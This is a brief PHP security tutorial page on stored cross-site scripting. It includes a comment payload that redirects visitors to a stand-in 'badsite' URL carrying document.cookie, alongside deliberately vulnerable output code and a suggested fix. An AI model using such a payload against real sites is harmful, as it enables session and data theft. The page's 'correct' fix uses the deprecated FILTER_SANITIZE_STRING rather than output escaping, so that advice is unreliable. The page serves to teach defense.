SECURITY

  minte9
REMEMBERS




Last update:   12-05-2022

XSS

This attack works only if the application fails to escape output.
 
# Browsers have some XSS protection, 
# we need to disable it for this test example.

<?php header('X-XSS-Protection:0'); ?>

<script>
    function setCookie(c_name,value,exdays) {
        var exdate=new Date();
            exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays==null) ? "" : 
                "; expires="+exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }
    setCookie('username', 'john'); // Logged user data in Cookie
    setCookie('email', 'john@yahoo.com');
</script>

# User submit malicious comment

<form method="POST">
    Add a comment: 
    <textarea name="comment">
        <script> 
            document.location = 
                "badsite/test.php?cookies="+ document.cookie; // Look Here
        </script>
    </textarea>
    <inputt type="submit" name="btn_submit"/>
</form>
Submited comment is displayed to other logged users.
 
# Redirects to badurl?cookies=username=john&email=john@yahoo.com
# and expose logged user private data

# Wrong!
echo $_POST['comment']; // Look Here

# Correct
filter_var($_POST['comment'], FILTER_SANITIZE_STRING);

Questions    
Spoofed forms
        A B C D E F
🔔
1/2